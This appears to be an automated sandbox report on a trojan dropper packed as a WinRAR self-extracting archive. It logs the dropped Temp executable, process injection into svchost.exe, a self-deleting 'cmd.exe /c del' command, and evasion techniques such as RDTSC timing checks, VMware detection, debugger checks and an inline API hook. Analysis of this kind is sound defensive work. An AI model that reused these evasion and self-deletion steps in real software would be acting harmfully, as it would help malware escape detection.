Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: F61A.tmp.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F61A.tmp.1.dr

Static PE information: Section .text

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File read: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Jump to behavior

Source: primosdv3.1.1.0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\primosdv3.1.1.0.exe C:\Users\user\Desktop\primosdv3.1.1.0.exe
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/4@2/2

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C66C74 GetLastError,FormatMessageW,

0_2_00C66C74

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00C7A6C2

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: sfxname	0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: sfxstime	0_2_00C7DF1E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Command line argument: STARTDLG	0_2_00C7DF1E

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: primosdv3.1.1.0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: primosdv3.1.1.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: primosdv3.1.1.0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
Source:	Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp

Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: primosdv3.1.1.0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F640 push ecx; ret	0_2_00C7F653
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7EB78 push eax; ret	0_2_00C7EB96
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0169D0D1 push ecx; ret	2_2_0169D0E4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00417B13 push edi; retf	2_2_00417B14
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00417D68 push edx; ret	2_2_00417D6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572

PE file contains sections with non-standard names

Source: primosdv3.1.1.0.exe

Static PE information: section name: .didat

File is packed with WinRar

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109

Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.410591725114109

Drops PE files

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	File created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	File created: C:\Users\user\AppData\Local\Temp\F61A.tmp			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\F61A.TMP

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F61A.tmp

Jump to dropped file

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01686DE6 rdtsc

2_2_01686DE6

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

API coverage: 9.3 %

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7E6A3 VirtualQuery,GetSystemInfo,

0_2_00C7E6A3

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C6A69B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7C220
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8B348 FindFirstFileExA,	0_2_00C8B348

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

API call chain: ExitProcess graph end node

Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000003.00000000.304900101.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.299904671.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.284751375.000000000F62F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft Sto

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00C7F838

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C8C030 GetProcessHeap,

0_2_00C8C030

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01686DE6 rdtsc

2_2_01686DE6

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C87DEE mov eax, dword ptr fs:[00000030h]	0_2_00C87DEE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD007A mov eax, dword ptr fs:[00000030h]	1_2_00BD007A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0019 mov eax, dword ptr fs:[00000030h]	1_2_00BD0019
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0149 mov eax, dword ptr fs:[00000030h]	1_2_00BD0149
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0005 mov eax, dword ptr fs:[00000030h]	1_2_00BD0005
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C962 mov eax, dword ptr fs:[00000030h]	2_2_0164C962
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]	2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]	2_2_0166C577
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]	2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]	2_2_0164B171
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]	2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]	2_2_0166B944
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01683D43 mov eax, dword ptr fs:[00000030h]	2_2_01683D43
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3540 mov eax, dword ptr fs:[00000030h]	2_2_016C3540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01667D50 mov eax, dword ptr fs:[00000030h]	2_2_01667D50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718D34 mov eax, dword ptr fs:[00000030h]	2_2_01718D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120 mov ecx, dword ptr fs:[00000030h]	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AD30 mov eax, dword ptr fs:[00000030h]	2_2_0164AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016CA537 mov eax, dword ptr fs:[00000030h]	2_2_016CA537
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]	2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]	2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016D41E8 mov eax, dword ptr fs:[00000030h]	2_2_016D41E8
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016F8DF1 mov eax, dword ptr fs:[00000030h]	2_2_016F8DF1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016735A1 mov eax, dword ptr fs:[00000030h]	2_2_016735A1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]	2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]	2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C69A6 mov eax, dword ptr fs:[00000030h]	2_2_016C69A6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A185 mov eax, dword ptr fs:[00000030h]	2_2_0167A185
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C182 mov eax, dword ptr fs:[00000030h]	2_2_0166C182
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672990 mov eax, dword ptr fs:[00000030h]	2_2_01672990
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]	2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]	2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01702073 mov eax, dword ptr fs:[00000030h]	2_2_01702073
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01711074 mov eax, dword ptr fs:[00000030h]	2_2_01711074
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166746D mov eax, dword ptr fs:[00000030h]	2_2_0166746D
